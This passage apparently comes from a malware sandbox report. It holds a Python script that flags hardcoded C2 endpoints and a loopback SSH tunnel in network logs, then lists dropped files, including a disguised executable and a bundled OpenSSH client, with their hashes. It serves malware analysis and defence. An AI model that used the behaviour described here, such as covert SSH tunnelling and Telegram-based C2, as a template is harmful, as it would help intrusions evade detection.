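    return {domain for _, _, port, domain, proto in rows if proto == "udp" and port == 53}


def summarize(text):
    """One entry per non-DNS destination, most contacted first."""
    rows = parse_rows(text)
    resolved = resolved_names(rows)
    counts, meta = Counter(), {}
    for country, ip, port, domain, proto in rows:
        if proto == "udp" and port == 53:
            continue  # the lookups themselves are not destinations
        counts[(ip, port)] += 1
        meta[(ip, port)] = (country, domain)
    summary = []
    for (ip, port), n in counts.most_common():
        country, domain = meta[(ip, port)]
        loopback = ipaddress.ip_address(ip).is_loopback
        # Reached by address: Domain missing, equal to the IP, or never queried.
        hardcoded = not loopback and (domain is None or domain == ip or domain not in resolved)
        summary.append({"ip": ip, "port": port, "domain": domain, "country": country,
                        "count": n, "loopback": loopback, "hardcoded": hardcoded})
    return summary


def hardcoded_endpoints(summary):
    """ip:port of every destination contacted without a preceding DNS lookup."""
    return [f"{e['ip']}:{e['port']}" for e in summary if e["hardcoded"]]


def tunnel_endpoint_seen(summary, local=TUNNEL_LOCAL):
    """True if the loopback destination in the log is the tunnel's local side."""
    return any(e["loopback"] and (e["ip"], e["port"]) == local for e in summary)


if __name__ == "__main__":
    s = summarize(NETWORK_ROWS)
    for e in s:
        print(f"{e['count']:>3} {e['ip']}:{e['port']} {e['domain'] or '-'} hardcoded={e['hardcoded']}")
    print("hardcoded:", hardcoded_endpoints(s), "tunnel endpoint seen:", tunnel_endpoint_seen(s))
```

Run against the full 140 records the same script reports 40 contacts each for the two 8080 endpoints and for api.telegram.org; on the excerpt it reports 4 each, with 217.145.238.175:80 also flagged as contacted by address.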

Files

memory/2408-0-0x0000000000090000-0x00000000000F2000-memory.dmp

memory/2408-1-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

memory/2408-2-0x00000000004D0000-0x0000000000550000-memory.dmp

memory/2408-5-0x000007FEF5D90000-0x000007FEF677C000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538exe_JC.exe

MD5 a43b860d290321de53ed6deb5cae95af
SHA1 62cc70d91f7e39fc93b9b0f106f78a90cfc54047
SHA256 6a04236a1990191a46fae7e4f2b87cd5b75b225f9ea073d34dab40ba25d7b538
SHA512 535cca5f0fdd3efecfca76760ab914b1c29ef7accc4e0789e5f658b1aa922fac854cfca752c745843c667d3be67672185973a79335496ef4b0a0f73d47c3b1a5

memory/2600-9-0x0000000000F20000-0x0000000000F82000-memory.dmp

memory/2600-10-0x000007FEF53A0000-0x000007FEF5D8C000-memory.dmp

memory/2600-11-0x000000001AF70000-0x000000001AFF0000-memory.dmp

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe

MD5 d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1 011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA256 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512 de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f

C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\libcrypto.dll

MD5 79a6e2268dfdba1d94c27f4b17265ff4
SHA1 b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA256 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA512 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c

C:\Users\Admin\AppData\Local\Temp\Cab9262.tmp

MD5 f3441b8572aae8801c04f3060b550443
SHA1 4ef0a35436125d6821831ef36c28ffaf196cda15
SHA256 6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf
SHA512 5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

memory/2600-144-0x000007FEF53A0000-0x000007FEF5D8C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Tar939D.tmp

MD5 9441737383d21192400eca82fda910ec
SHA1 725e0d606a4fc9ba44aa8ffde65bed15e65367e4
SHA256 bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5
SHA512 7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

memory/2716-209-0x000007FEF53A0000-0x000007FEF5D8C000-memory.dmp

C:\Users\Admin\AppData\Local\w3bgb431s6\port.dat

MD5 4ebccfb3e317c7789f04f7a558df4537
SHA1 e5b088349a802b84e981bd16273875b3ea68bb0e
SHA256 893cb5b1a02d4dcada2c464508cc4e47b86f8f21185b6032d5a12cb3f1e4541a
SHA512 77b89093f4b8705948b070e56abe193fdc17c1bd8a9adc28a0b5f10886dc8ad528279496992b87eb1107b850e3a77475a9f6b250f3a5c761996e10173a9e1c19

C:\Users\Admin\.ssh\known_hosts

MD5 18015a60cd12f33648facec1263cfafa
SHA1 31b7afd9a2dc51bfad694e5772d430fceedbac3f
SHA256 9ab8d1a229e05070a0364b5c5efd2ab1ddf676b0bc00314ec336bcdc00998190
SHA512 fcdb2e02f01c59916eaa08baeb74cc2f61eed6d96873f41a2299b752b9ec1af5db74a6eac6013c9a45a77d0bbc0431590f16fa74cff779eea97383e2fe073925

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 24e41fef3aa9b04cae1a38e4c2b863ac
SHA1 b2a905fde1f6f778fca66270e861c92c55078fc2
SHA256 4812b7652cfc4ce58559bbba0144cf9a462af28789aaa599e2a2c2ab6b159e90
SHA512 1ee9e4add5f91bd92dada987946a9f85e2d58763dd041ae293a2a48c3a358c754301b06abd07c971543bfb694441b18abcf1d0f53da0e031328b151b4c3ce0f1

memory/2716-232-0x000007FEF53A0000-0x000007FEF5D8C000-memory.dmp

memory/2716-233-0x000000001AD00000-0x000000001AD80000-memory.dmp